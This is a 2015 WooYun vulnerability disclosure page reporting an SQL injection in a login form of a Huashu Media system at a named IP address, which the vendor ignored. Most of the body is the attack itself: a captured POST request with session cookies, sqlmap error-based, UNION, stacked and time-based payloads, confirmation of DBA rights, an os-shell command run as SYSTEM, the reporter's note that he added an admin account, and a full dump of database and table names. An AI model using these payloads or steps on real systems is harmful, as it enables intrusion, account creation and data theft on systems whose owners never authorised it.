当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121959

漏洞标题:华数某系统存在SQL注入

相关厂商:华数传媒网络有限公司

漏洞作者:

提交时间:2015-06-23 15:49

修复时间:2015-06-28 15:50

公开时间:2015-06-28 15:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-23: 细节已通知厂商并且等待厂商处理中
2015-06-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

**

详细说明:

地址:http://218.108.255.183/UserLogin/Login.aspx
POST注入
登录抓包:

POST /UserLogin/Login.aspx HTTP/1.1
Host: 218.108.255.183
Proxy-Connection: keep-alive
Content-Length: 204
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://218.108.255.183
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://218.108.255.183/UserLogin/Login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=hfivawitao0pgzzcqewfst45; JSESSIONID=1wx3gyfq326t51xahj4mziimtt; ems.userName=admin; ems.rememberName=true
__VIEWSTATE=%2FwEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw%2BBISbkwo%3D&__EVENTVALIDATION=%2FwEWBAKHhpR8Au3yj58JAvfEm%2BEEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0%3D&hidSubmit=Login&txt_UserName=aaa&txt_Pwd=aaa


POST注入,DBA权限:

sts:
---
Place: POST
Parameter: txt_UserName
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw BISbkwo=&__
EVENTVALIDATION=/wEWBAKHhpR8Au3yj58JAvfEm EEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0=
&hidSubmit=Login&txt_UserName=aaa' AND 5524=CONVERT(INT,(CHAR(58) CHAR(105) CHAR
(102) CHAR(116) CHAR(58) (SELECT (CASE WHEN (5524=5524) THEN CHAR(49) ELSE CHAR(
48) END)) CHAR(58) CHAR(105) CHAR(104) CHAR(111) CHAR(58))) AND 'gqgC'='gqgC&txt
_Pwd=aaa
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: __VIEWSTATE=/wEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw BISbkwo=&__
EVENTVALIDATION=/wEWBAKHhpR8Au3yj58JAvfEm EEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0=
&hidSubmit=Login&txt_UserName=-6445' UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(10
5) CHAR(102) CHAR(116) CHAR(58) CHAR(98) CHAR(108) CHAR(72) CHAR(108) CHAR(65) C
HAR(104) CHAR(100) CHAR(110) CHAR(81) CHAR(79) CHAR(58) CHAR(105) CHAR(104) CHAR
(111) CHAR(58),NULL,NULL,NULL-- &txt_Pwd=aaa
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw BISbkwo=&__
EVENTVALIDATION=/wEWBAKHhpR8Au3yj58JAvfEm EEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0=
&hidSubmit=Login&txt_UserName=aaa'; WAITFOR DELAY '0:0:5'--&txt_Pwd=aaa
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw BISbkwo=&__
EVENTVALIDATION=/wEWBAKHhpR8Au3yj58JAvfEm EEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0=
&hidSubmit=Login&txt_UserName=aaa' WAITFOR DELAY '0:0:5'--&txt_Pwd=aaa
---
[16:04:03] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[16:04:03] [INFO] testing if current user is DBA
current user is DBA: True
[16:04:03] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[16:04:03] [INFO] fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\218.108.255.183'
[*] shutting down at 16:04:03


DBA可以直接执行CMD命令:

os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
[16:11:59] [INFO] the SQL query used returns 1 entries
[16:12:00] [INFO] retrieved: "nt authority\\\\system"
command standard output [1]:
[*] nt authority\system
os-shell>


可以添加管理账户,
我添加了个wooyun/test123
列下数据库:

available databases [7]:
[*] master
[*] model
[*] msdb
[*] RMSS
[*] RMSS20140825
[*] RMSS_TEST
[*] tempdb


表名:

Database: RMSS
[247 tables]
+-------------------------------+
| 1111111 |
| AssemblyAddress_List |
| AssemblyPortSource_Details |
| AssemblyPortSource_Details_Mb |
| AssemblyPortSource_Master |
| Assembly_Details |
| Assembly_List |
| CMTS |
| Cabinet_Info |
| ClientTypeA |
| ClientTypeALocal |
| Client_Info |
| Equipment_AdrDistribute |
| Equipment_Borrow |
| Equipment_Info |
| Equipment_Resource |
| Exit_LinkLayer |
| F_sjzd |
| Ggglll_Info |
| Ggjf_GggL_List |
| Ggjf_GggL_details |
| Ggjf_Jfsgd_List |
| Ggjf_Jfsgd_details |
| Gz_pb |
| Gz_pbgl |
| Gzcl_Gzbg |
| Gzcl_Gzcc |
| Gzcl_Gzlx |
| Gzcl_Gzly |
| Gzcl_Gzpg |
| Gzcl_Gztzsj |
| Gzgl_GzdjSet |
| Gzgl_Gzzy |
| Gzl_Cszy |
| Gzl_Gjsq |
| Gzl_Gjsq_wj |
| Gzl_Glzy |
| Gzl_Gzts |
| Gzl_Gzts_Cllc |
| Gzl_Gzts_CsNote |
| Gzl_Gzts_Gzzt |
| Gzl_IPwgzy |
| Gzl_Jfsg |
| Gzl_Jfzy |
| Gzl_Lcqd |
| Gzl_Xtbg |
| Gzl_xtbg_hcysz |
| Gztz_Cstz |
| GzzjDetail |
| GzzjMaster |
| IP_Bussiness |
| IP_Bussiness_Restore |
| IP_Distribute |
| IP_Explorer |
| IP_Free_Info |
| IP_Restore_Info |
| IP_Source_Master |
| IP_VPN_Distribute |
| JG_Resource |
| Jkgl_JkSb |
| Jkgl_Jkd |
| Jkgl_Khzy |
| Jkgl_Ywpz |
| Jkgl_Ywpz_gl |
| Jrlx_List |
| Keep_Watch_Group |
| Kh_Update_Log |
| Ly_Ht |
| Ly_Lyxx |
| Ly_Wygs |
| MachineRoom |
| MyGroups |
| MyGroups_Items |
| MyWork_NewPbgl |
| NDTV_Equipment |
| Numeral_TV |
| OA_Files |
| OA_Info |
| OA_tx |
| ONU_Dk |
| ONU_Dk_Mb |
| PVCID |
| PVCID_Distribute |
| RoleGroup |
| RoleItems |
| SMS_History |
| SMS_LOG |
| SMS_NotePad |
| SMS_Phrase |
| SMS_Team |
| SMS_TempPhone |
| SYS_Calendar |
| SYS_Calendar_Item |
| SYS_CurrUserList |
| SYS_FILE |
| SYS_GROUPS |
| SYS_Image |
| SYS_Lcsq |
| SYS_Lcsq_Gly |
| SYS_Lcsq_Glyqx |
| SYS_Log |
| SYS_MsgTable |
| SYS_PKeyInfo |
| SYS_RULES |
| SYS_TABLE |
| SYS_TABLE_FIELD |
| SYS_TaxClient |
| SYS_USERS |
| SYS_WFCAT |
| SYS_WFS |
| SYS_WFS_Controls |
| SYS_WFS_LINKS |
| SYS_WFS_Nodes |
| SYS_WFS_TABLES |
| SYS_WFS_UNITS |
| SYS_WFS_USERS |
| SYS_WF_Cscd |
| SYS_WF_MAIL_SMS |
| SYS_WF_PRCLNKS |
| SYS_WF_PRCS |
| SYS_WF_SHARE |
| SYS_WF_State |
| SYS_WF_State_Folder |
| SYS_WF_TASKS |
| SYS_WF_Task_Master |
| SYS_WF_Url |
| SbIpzygl |
| Signature |
| Spur_Track_Info |
| Sys_Mlcsq |
| Sys_Values |
| Sys_Wfs_Add |
| TCP_TOR |
| TS_ZD |
| TS_ZD_Info |
| T_Gw_User |
| T_User |
| T_User_Gwmc |
| T_dzxxgh |
| T_dzztgh |
| T_vlan |
| TaskDetail |
| TaskMaster |
| TaskPrivilege |
| Te_UserSelect |
| Transfers_Details |
| Transfers_Info |
| Ts_DataBackup |
| Ts_DataType |
| Ts_Dep_menu |
| Ts_E_Dep_menu |
| Ts_Gllx |
| Ts_Kh1 |
| Ts_Logs |
| Ts_UserRight |
| Ts_fz |
| Ts_onLineUser |
| Ts_sys_menu |
| Ts_userGroup |
| Ts_userGroupRight |
| Ts_userGroup_info |
| VPN_Resource |
| V_GsbDk |
| Vlan_Distribute |
| Vlan_Restore |
| Watch_Info |
| DataBase |
| assmblyportsource_master_bz |
| bs_code |
| ckll_backup |
| config |
| device |
| dtproperties |
| fav_dir |
| fav_link |
| file_temp |
| frjfb |
| frjrjft |
| ggjfjrsb |
| ip_bussiness1 |
| ip_store |
| ip_store_23 |
| ip_store_orign |
| kb_Files |
| kb_Files_Attachments |
| kb_Folders |
| kb_FoldersFiles |
| kb_Folders_AttachmentUser |
| kb_Folders_Privilege |
| kb_Privilege_Templates |
| kb_ProjectDocument |
| kb_files_Comment |
| kb_files_Reader |
| kb_files_Recommend |
| msn_dysw |
| msn_gongzuo |
| mylcsq |
| mylcsq_prcs |
| news |
| newsAnnex |
| play_evolutions |
| ref |
| ref_ip |
| selfuseing_ip |
| sqlmapoutput |
| sys_dwzt |
| sysdiagrams |
| t |
| temp_mylc |
| temp_mywork |
| tmp_ipbussinessid |
| todete |
| ts_GroupFzzjRight |
| ts_GroupHyRight |
| ts_GroupQyRight |
| ts_HyRight |
| ts_QyRight |
| ts_fzzg_right |
| ts_kh |
| ts_kh_ORA |
| ts_kh_restore |
| ts_kh_tmp |
| v_Kh_Lx |
| v_Kh_Rank |
| v_UserInfo |
| v_wt_all |
| vlan_temp1 |
| vlan_temp2 |
| voip_ip_store |
| vw_DepGzzj |
| vw_DepTask |
| vw_GggL_List |
| vw_PersonGzzj |
| vw_PersonTask |
| vw_gztj |
| vw_hotArticle |
| vw_iP_Restore_Info |
| vw_ip_distribute |
| vw_ip_free |
| vw_ip_source_master |
| vw_kb_FilesProjects |
| vw_newArticle |
| vw_recommandArticle |
| vw_sbly_List |
| vw_zww_IP_Restore_Info |
| vw_zww_ip_distribute |
| vw_zww_ip_source_master |
+-------------------------------+


漏洞证明:

RT

修复方案:

**

版权声明:转载请注明来源 @乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-28 15:50

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无